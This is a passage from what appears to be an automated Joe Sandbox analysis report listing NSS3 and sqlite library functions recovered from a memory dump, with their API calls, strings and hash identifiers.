                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c962cf9e4db3d344d956f4efd2456a7df7017447a54bade2f3767e013d253615
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61F0F9B260321057FF10DF199C41F877698DB81799F11063BDD299BF41D761F80582E1
                                                                                                                                                                                                                          Function 6C500840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2F88,6C500660,00000020,00000000,?,?,6C502C3D,?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C500860
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000020,00000000,?,?,6C502C3D,?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C500874
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000001), ref: 6C500884
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C5008A3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$CallOnce
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2502187247-0
                                                                                                                                                                                                                          • Opcode ID: e1e459967a62f6fb86ac04ecd43c5b19dee775e323f5d6518604d5fe486be404
                                                                                                                                                                                                                          • Instruction ID: fb1afb20aee20782f39640c4915f9dbffe3bd620b3dac81fd70977822274f37a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1e459967a62f6fb86ac04ecd43c5b19dee775e323f5d6518604d5fe486be404
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD012075F00345ABEB012F25DC459557734FF9731DF0A0566EC0895E01EB21A85487DA
                                                                                                                                                                                                                          Function 6C4CFD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C479003,?), ref: 6C4CFD91
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(A4686C4D,?), ref: 6C4CFDA2
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,12D068C3,A4686C4D,?,?), ref: 6C4CFDC4
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?), ref: 6C4CFDD1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2335489644-0
                                                                                                                                                                                                                          • Opcode ID: f8ddf9dadac80ee83b5128f8e6a580f02effb0565d2670c52ad726afbddddc2b
                                                                                                                                                                                                                          • Instruction ID: b159cc6bc64904850b851daaf08d87b681b4f4f20b6774381fdacfa487cc01e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8ddf9dadac80ee83b5128f8e6a580f02effb0565d2670c52ad726afbddddc2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75F0C8B97022029BFB049B55DC90D177B68EF84799B148074ED0A8BB11E721E815C7F2
                                                                                                                                                                                                                          Function 6C58CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2988086103-0
                                                                                                                                                                                                                          • Opcode ID: 2e6c1cbef8b8112a5bb759d67e403d0bbbd943e86aa7072167d3ee6a644ceaf6
                                                                                                                                                                                                                          • Instruction ID: fa08770f15aa3320f578dab9c4c8310cdd2965014aaa963566d5d1bec089dd16
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e6c1cbef8b8112a5bb759d67e403d0bbbd943e86aa7072167d3ee6a644ceaf6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89E06576700A089FCA10EFA9DC48C8B77BCEE492743160529E691C7700D332F905CBE5
                                                                                                                                                                                                                          Function 6C469DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_value_text.NSS3 ref: 6C469E1F
                                                                                                                                                                                                                            • Part of subcall function 6C4213C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C3F2352,?,00000000,?,?), ref: 6C421413
                                                                                                                                                                                                                            • Part of subcall function 6C4213C0: memcpy.VCRUNTIME140(00000000,R#?l,00000002,?,?,?,?,6C3F2352,?,00000000,?,?), ref: 6C4214C0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ESCAPE expression must be a single character, xrefs: 6C469F78
                                                                                                                                                                                                                          • LIKE or GLOB pattern too complex, xrefs: 6C46A006
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                                                                                                          • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                                          • API String ID: 2453365862-264706735
                                                                                                                                                                                                                          • Opcode ID: 9b84b059de969d1bc32182b0c18308f8d073173ec133eb5c1b2aac694563f089
                                                                                                                                                                                                                          • Instruction ID: 7d19a83c14f88cd0d4b50a8bbde62d55eecf76556bdb4b22734f570e9796106a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b84b059de969d1bc32182b0c18308f8d073173ec133eb5c1b2aac694563f089
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C811970A046518BD704CF26C480FA9B7F2AF95319F198659D8A48BFC9D773D847C790
                                                                                                                                                                                                                          Function 6C4E5860 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD037,00000000), ref: 6C4E59C8
                                                                                                                                                                                                                            • Part of subcall function 6C4E7EE0: PR_SetError.NSS3(00000000,00000000,00000002,?,?), ref: 6C4E7F30
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD0AE,00000000), ref: 6C4E59E9
                                                                                                                                                                                                                            • Part of subcall function 6C4EAA40: PR_SetError.NSS3(00000000,00000000,00000008,?,?), ref: 6C4EAAA2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error
                                                                                                                                                                                                                          • String ID: nXl
                                                                                                                                                                                                                          • API String ID: 2619118453-2538165799
                                                                                                                                                                                                                          • Opcode ID: e1bd1071422012d81e6f4f6615cbe8badc6a25988ed1359614f1323c998b4022
                                                                                                                                                                                                                          • Instruction ID: a36d0762691404302dfa3af20d4dab6dea458ec58737c445554d8883df001155
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1bd1071422012d81e6f4f6615cbe8badc6a25988ed1359614f1323c998b4022
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD41A4716083019FD710DF14DC85F9B73A8AB4832AF564629FD599B782E770E908CBE1
                                                                                                                                                                                                                          Function 6C4C4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4C4D57
                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C4C4DE6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorR_snprintf
                                                                                                                                                                                                                          • String ID: %d.%d
                                                                                                                                                                                                                          • API String ID: 2298970422-3954714993
                                                                                                                                                                                                                          • Opcode ID: c04b2178c31a52a406666a7f31570d4bffa828acf978a8da86b7ccd2f1a6e6a5
                                                                                                                                                                                                                          • Instruction ID: bce491581265a025431ac02413924f763edbf379fa0a1b2c1a4bb7a2a0b011fa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c04b2178c31a52a406666a7f31570d4bffa828acf978a8da86b7ccd2f1a6e6a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF31D6B6E042186BEB10EBA19C01FFF7768EF80349F050429ED159B791EB319905CBE6
                                                                                                                                                                                                                          Function 6C4E4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3('8Nl,00000000,00000000,?,?,6C4E3827,?,00000000), ref: 6C4E4D0A
                                                                                                                                                                                                                            • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C4E4D22
                                                                                                                                                                                                                            • Part of subcall function 6C4CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C471A3E,00000048,00000054), ref: 6C4CFD56
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                                                                                                                          • String ID: '8Nl
                                                                                                                                                                                                                          • API String ID: 1521942269-472363851
                                                                                                                                                                                                                          • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                          • Instruction ID: faaf1da02f076401c36e61d6fa22b85c5f9c96ca1c42ad876172112f7ffff881
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94F0623260123467EB108DAAAC80F8737DC9B496FFF161271ED28CBB91E621DC0586E1
                                                                                                                                                                                                                          Function 6C50AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_GetUniqueIdentity.NSS3(SSL), ref: 6C50AF78
                                                                                                                                                                                                                            • Part of subcall function 6C46ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46ACE2
                                                                                                                                                                                                                            • Part of subcall function 6C46ACC0: malloc.MOZGLUE(00000001), ref: 6C46ACEC
                                                                                                                                                                                                                            • Part of subcall function 6C46ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C46AD02
                                                                                                                                                                                                                            • Part of subcall function 6C46ACC0: TlsGetValue.KERNEL32 ref: 6C46AD3C
                                                                                                                                                                                                                            • Part of subcall function 6C46ACC0: calloc.MOZGLUE(00000001,?), ref: 6C46AD8C
                                                                                                                                                                                                                            • Part of subcall function 6C46ACC0: PR_Unlock.NSS3 ref: 6C46ADC0
                                                                                                                                                                                                                            • Part of subcall function 6C46ACC0: PR_Unlock.NSS3 ref: 6C46AE8C
                                                                                                                                                                                                                            • Part of subcall function 6C46ACC0: free.MOZGLUE(?), ref: 6C46AEAB
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C5D3084,6C5D02AC,00000090), ref: 6C50AF94
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
                                                                                                                                                                                                                          • String ID: SSL
                                                                                                                                                                                                                          • API String ID: 2424436289-2135378647
                                                                                                                                                                                                                          • Opcode ID: 73936de93013c89a42cc82dbfb6ecd4d6409fc77ff8536af8c1f625d3f5eca27
                                                                                                                                                                                                                          • Instruction ID: e23d0bc0c6a8536e72d1d913debf15ea6bdcd3e84c37e453e18f9f461038c29f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73936de93013c89a42cc82dbfb6ecd4d6409fc77ff8536af8c1f625d3f5eca27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 732143B6706B48DACB00EF51AD837127AF2B343708B529129C1199BF25D73172489FEE
                                                                                                                                                                                                                          Function 6C460F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
                                                                                                                                                                                                                            • Part of subcall function 6C461370: GetSystemInfo.KERNEL32(?,?,?,?,6C460936,?,6C460F20,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000), ref: 6C46138F
                                                                                                                                                                                                                          • PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
                                                                                                                                                                                                                            • Part of subcall function 6C461110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C460936,00000001,00000040), ref: 6C461130
                                                                                                                                                                                                                            • Part of subcall function 6C461110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C460936,00000001,00000040), ref: 6C461142
                                                                                                                                                                                                                            • Part of subcall function 6C461110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C460936,00000001), ref: 6C461167
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoModulePageSecureSizeSystemcallocstrdup
                                                                                                                                                                                                                          • String ID: clock
                                                                                                                                                                                                                          • API String ID: 536403800-3195780754
                                                                                                                                                                                                                          • Opcode ID: 72a50c549e850b09c088389728f7aa62c5b23060bfd9b6e7e227a3515064e803
                                                                                                                                                                                                                          • Instruction ID: ae073eea65f042f11a716f09c1e9e84661f58f9c18057ff458f0a46d82beb7c7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72a50c549e850b09c088389728f7aa62c5b23060bfd9b6e7e227a3515064e803
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90D0223160020415C600A297AC45F9AB2BCC7C327AF00082AE00882E048B2574EBC2AD
                                                                                                                                                                                                                          Function 6C4D0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$calloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3339632435-0
                                                                                                                                                                                                                          • Opcode ID: 06c9ce6ee669cd0872f923f964c6b59c93e15fd9b3c3c540eef7dc38f8c036a7
                                                                                                                                                                                                                          • Instruction ID: 9faeb92f070ff0a36f6b37508af881ab9ec881005d8387683d97c9dab4499168
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06c9ce6ee669cd0872f923f964c6b59c93e15fd9b3c3c540eef7dc38f8c036a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E31A070A457968BDB00FF39C854E5977A4BF06309F03462DD8888BB11DB30E485CA89
                                                                                                                                                                                                                          Function 6C4D0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C472AF5,?,?,?,?,?,6C470A1B,00000000), ref: 6C4D0F1A
                                                                                                                                                                                                                          • malloc.MOZGLUE(00000001), ref: 6C4D0F30
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C4D0F42
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4D0F5B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
